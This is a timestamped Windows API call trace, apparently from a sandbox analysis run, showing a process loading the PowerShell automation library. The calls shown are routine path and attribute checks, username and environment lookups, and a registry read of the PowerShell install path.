	[0356.097] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0356.097] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.098] SetErrorMode (uMode=0x1) returned 0x1
	[0356.098] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0356.098] SetErrorMode (uMode=0x1) returned 0x1
	[0356.098] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.098] SetErrorMode (uMode=0x1) returned 0x1
	[0356.098] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0356.098] SetErrorMode (uMode=0x1) returned 0x1
	[0356.098] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.098] SetErrorMode (uMode=0x1) returned 0x1
	[0356.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.099] SetErrorMode (uMode=0x1) returned 0x1
	[0356.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.099] SetErrorMode (uMode=0x1) returned 0x1
	[0356.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ce90 | out: lpFileInformation=0x10ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.099] SetErrorMode (uMode=0x1) returned 0x1
	[0356.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.099] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.100] SetErrorMode (uMode=0x1) returned 0x1
	[0356.100] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0356.100] SetErrorMode (uMode=0x1) returned 0x1
	[0356.100] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.100] SetErrorMode (uMode=0x1) returned 0x1
	[0356.100] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0356.100] SetErrorMode (uMode=0x1) returned 0x1
	[0356.100] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.100] SetErrorMode (uMode=0x1) returned 0x1
	[0356.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.101] SetErrorMode (uMode=0x1) returned 0x1
	[0356.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.101] SetErrorMode (uMode=0x1) returned 0x1
	[0356.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10ced0 | out: lpFileInformation=0x10ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.101] SetErrorMode (uMode=0x1) returned 0x1
	[0356.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.103] SetErrorMode (uMode=0x1) returned 0x1
	[0356.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10d190 | out: lpFileInformation=0x10d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0356.103] SetErrorMode (uMode=0x1) returned 0x1
	[0356.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.427] CoTaskMemAlloc (cb=0x804) returned 0x1b7dbd40
	[0356.427] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dbd40, nSize=0x10d4f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4f8) returned 0x1
	[0356.428] CoTaskMemFree (pv=0x1b7dbd40) 
	[0356.428] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0356.428] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d538 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d538) returned 1
	[0356.428] CoTaskMemFree (pv=0x3576b0) 
	[0356.430] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32e7cf8*="Available", lpRawData=0x32e7a88) returned 1
	[0356.559] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.559] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.560] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.560] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.567] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.567] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0356.567] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.567] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.567] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0356.567] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.569] GetCurrentProcessId () returned 0x618
	[0356.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.574] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d518 | out: phkResult=0x10d518*=0x38c) returned 0x0
	[0356.574] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d49c, lpData=0x0, lpcbData=0x10d498*=0x0 | out: lpType=0x10d49c*=0x1, lpData=0x0, lpcbData=0x10d498*=0x56) returned 0x0
	[0356.574] CoTaskMemAlloc (cb=0x5a) returned 0x3b3670
	[0356.574] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x3b3670, lpcbData=0x10d468*=0x56 | out: lpType=0x10d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d468*=0x56) returned 0x0
	[0356.574] CoTaskMemFree (pv=0x3b3670) 
	[0356.574] RegCloseKey (hKey=0x38c) returned 0x0
	[0356.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
